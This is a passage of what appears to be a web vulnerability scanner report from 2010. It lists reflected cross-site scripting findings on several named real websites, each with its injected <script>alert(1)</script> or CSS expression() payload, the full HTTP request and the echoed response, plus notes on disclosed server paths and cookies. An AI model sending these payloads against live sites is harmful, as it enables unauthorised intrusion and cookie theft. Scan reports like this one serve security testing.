TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 6089
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns/at?49c1c"><script>alert(1)</script>0ccf61bcd1e=1" />
...[SNIP]...

2.408. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926f7"><script>alert(1)</script>6a5b0f0910d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The base path of this entry already contains the URL-encoded payload from the earlier test of /ns/at (2.405); the scanner followed that mutated URL and re-tested it. The sink is the same request_uri hidden field as in 2.404 to 2.407, so entries 2.408 to 2.411 document the same underlying 404-page issue rather than additional ones.

Request

GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C926f7"><script>alert(1)</script>6a5b0f0910d/script%3Eddc017331/at HTTP/1.1
Host: www.sixapart.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 14:04:54 GMT
Server: Apache
Content-Location: error.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Connection: keep-alive
Content-Length: 6141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C926f7"><script>alert(1)</script>6a5b0f0910d/script%3Eddc017331/at" />
...[SNIP]...

2.409. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed08d"><script>alert(1)</script>5a3c5a87edb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331ed08d"><script>alert(1)</script>5a3c5a87edb/at HTTP/1.1
Host: www.sixapart.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 14:05:06 GMT
Server: Apache
Content-Location: error.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Connection: keep-alive
Content-Length: 6141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331ed08d"><script>alert(1)</script>5a3c5a87edb/at" />
...[SNIP]...

2.410. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6288e"><script>alert(1)</script>2f02a15c966 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at6288e"><script>alert(1)</script>2f02a15c966 HTTP/1.1
Host: www.sixapart.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 14:05:17 GMT
Server: Apache
Content-Location: error.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Connection: keep-alive
Content-Length: 6141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at6288e"><script>alert(1)</script>2f02a15c966" />
...[SNIP]...

2.411. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c43d"><script>alert(1)</script>8f3b4c0a94c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at?5c43d"><script>alert(1)</script>8f3b4c0a94c=1 HTTP/1.1
Host: www.sixapart.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 14:04:20 GMT
Server: Apache
Content-Location: error.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Connection: keep-alive
Content-Length: 6144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at?5c43d"><script>alert(1)</script>8f3b4c0a94c=1" />
...[SNIP]...

2.412. http://www.staffingindustry.com/ME2/dirmod.asp [mod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staffingindustry.com
Path:   /ME2/dirmod.asp

Issue detail

The value of the mod request parameter is copied into the HTML document as text between TITLE tags. The payload 46c24</title><script>alert(1)</script>8a8f7e7c860 was submitted in the mod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the TITLE element is parsed as text, the payload first has to close it with </title> before the browser will recognise the script element that follows. The response is also a verbose Centralpoint error page that writes the error source, description and internal method name into the title, which discloses internal component names on its own.

Request

GET /ME2/dirmod.asp?sid=4936C38869DA46FB97FA61453F6E697F&nm=Conferences+and+Events&type=WebTitle&mod=WebTitles46c24</title><script>alert(1)</script>8a8f7e7c860&mid=DD35BDEB326347298C16B515B4CB888F&tier=3&id=592A19FA4327487D8B0A16ED1D897004 HTTP/1.1
Host: www.staffingindustry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 13:17:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
cache-control: no-store
Content-Length: 296
Content-Type: text/html
Expires: Wed, 15 Dec 2010 13:17:30 GMT
Set-Cookie: IpAccessUser=Y; expires=Fri, 17-Dec-2010 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCQQTABRA=FDNLHOHAKKDINMBKPEJHLCKH; path=/
Cache-control: no-cache


<html>
   <head>
       
       <title><div><b>Error:</b> Centralpoint</div><div><b>Source:</b> Centralpoint</div><div><b>Description:</b> Module could not be found.</div><div><b>Method:</b> CpConsole.Sql.Ge
...[SNIP]...
</b> WebTitles46c24</title><script>alert(1)</script>8a8f7e7c860</div>

2.413. http://www.strongmail.com/resources/blogs/email_marketing_insights' [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/email_marketing_insights'

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a5acc<script>alert(1)</script>fdd3d950f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the blog's "Page not found" handler, which echoes the requested path as text; entries 2.414 to 2.420 reach the same handler through other paths under /resources/blogs/. The HTML comment that follows the echoed path also discloses an absolute server-side file path (/data1/web/cgi-bin/mt/php/lib/MTViewer.php) together with a line number and PHP error code.

Request

GET /resources/blogs/email_marketing_insights'a5acc<script>alert(1)</script>fdd3d950f0d HTTP/1.1
Host: www.strongmail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=75348304.1292505746.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; s_sq=%5B%5BB%5D%5D; __utma=75348304.758064691.1292505746.1292505746.1292505746.1; _mkto_trk=id:732-LLR-572&token:_mch-strongmail.com-1292505745708-88199; _jsuid=2323480347906359467; __utmc=75348304; __utmb=75348304.1.10.1292505746;

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:18:57 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/email_marketing_insights'a5acc<script>alert(1)</script>fdd3d950f0d<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.414. http://www.strongmail.com/resources/blogs/email_marketing_insights/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/email_marketing_insights/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d67d<script>alert(1)</script>2aa12a5bf2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/email_marketing_insights3d67d<script>alert(1)</script>2aa12a5bf2f/ HTTP/1.1
Host: www.strongmail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 13:30:18 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/email_marketing_insights3d67d<script>alert(1)</script>2aa12a5bf2f/<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.415. http://www.strongmail.com/resources/blogs/js/app.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/js/app.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0d24<script>alert(1)</script>cd7b810945d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/jsf0d24<script>alert(1)</script>cd7b810945d/app.js HTTP/1.1
Host: www.strongmail.com
Proxy-Connection: keep-alive
Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:17:47 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Content-Type: text/html; charset=utf-8
Content-Length: 10600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/jsf0d24<script>alert(1)</script>cd7b810945d/app.js<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.416. http://www.strongmail.com/resources/blogs/js/app.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/js/app.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72f1c<script>alert(1)</script>431883dd8be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/js/app.js72f1c<script>alert(1)</script>431883dd8be HTTP/1.1
Host: www.strongmail.com
Proxy-Connection: keep-alive
Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:17:52 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Content-Type: text/html; charset=utf-8
Content-Length: 10600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/js/app.js72f1c<script>alert(1)</script>431883dd8be<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.417. http://www.strongmail.com/resources/blogs/js/cufon.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/js/cufon.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4953e<script>alert(1)</script>d037fb92e58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/js4953e<script>alert(1)</script>d037fb92e58/cufon.js HTTP/1.1
Host: www.strongmail.com
Proxy-Connection: keep-alive
Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:17:50 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Content-Type: text/html; charset=utf-8
Content-Length: 10602


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/js4953e<script>alert(1)</script>d037fb92e58/cufon.js<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.418. http://www.strongmail.com/resources/blogs/js/cufon.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/js/cufon.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2064<script>alert(1)</script>0eaf6ce554a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/js/cufon.jsa2064<script>alert(1)</script>0eaf6ce554a HTTP/1.1
Host: www.strongmail.com
Proxy-Connection: keep-alive
Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:17:56 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Content-Type: text/html; charset=utf-8
Content-Length: 10602


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/js/cufon.jsa2064<script>alert(1)</script>0eaf6ce554a<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.419. http://www.strongmail.com/resources/blogs/js/jquery-1.2.6.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/js/jquery-1.2.6.min.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa2d6<script>alert(1)</script>b930b750297 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/jsfa2d6<script>alert(1)</script>b930b750297/jquery-1.2.6.min.js HTTP/1.1
Host: www.strongmail.com
Proxy-Connection: keep-alive
Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:17:50 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Content-Type: text/html; charset=utf-8
Content-Length: 10613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/jsfa2d6<script>alert(1)</script>b930b750297/jquery-1.2.6.min.js<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.420. http://www.strongmail.com/resources/blogs/js/jquery-1.2.6.min.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.strongmail.com
Path:   /resources/blogs/js/jquery-1.2.6.min.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15f03<script>alert(1)</script>9c399824315 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/blogs/js/jquery-1.2.6.min.js15f03<script>alert(1)</script>9c399824315 HTTP/1.1
Host: www.strongmail.com
Proxy-Connection: keep-alive
Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Thu, 16 Dec 2010 14:17:57 GMT
Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Content-Type: text/html; charset=utf-8
Content-Length: 10613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng">
   <head>
       <met
...[SNIP]...
<strong>Page not found - /resources/blogs/js/jquery-1.2.6.min.js15f03<script>alert(1)</script>9c399824315<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 -->
...[SNIP]...

2.421. http://www.stumbleupon.com/submit [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259e7"style%3d"x%3aexpression(alert(1))"b1f1939da85 was submitted in the url parameter. This input was echoed as 259e7"style="x:expression(alert(1))"b1f1939da85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC closes the attribute with the echoed double quote and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that this technique is specific to older versions of Internet Explorer (the request below was sent with an MSIE 7.0 User-Agent) and will not work on other browsers. Only the unencoded double quote is demonstrated by this entry; whether angle brackets are also echoed unmodified is not shown. Of the cookies set in the response only PHPSESSID carries the HttpOnly flag, so script running in this context can still read the remaining cookies.

Request

GET /submit?title=${video.headline}&url=http://cnn.com/video/data/2.0/video/${video.id}.html259e7"style%3d"x%3aexpression(alert(1))"b1f1939da85 HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=fsdf8hquh8f7j9ep1sqiai58n4; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=5494072004d0a117517be02.82601264; expires=Sat, 15-Jan-2011 13:17:41 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 15-Jan-2011 13:17:41 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 15-Jan-2011 13:17:41 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=f9322595a55e19c1904c470c02fa69a5%7C%7C10%7C%7C1292505461%7C2c61adf9bbdbdbad7c5f13e575f39b5e; expires=Sun, 13-Dec-2020 13:17:41 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49211
Date: Thu, 16 Dec 2010 13:17:41 GMT
X-Varnish: 3208383492
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://cnn.com/video/data/2.0/video/${video.id}.html259e7"style="x:expression(alert(1))"b1f1939da85" />
...[SNIP]...

2.422. http://www.typepad.com/services/toolbar [autofollowed parameter]

Summary

Severity:   High
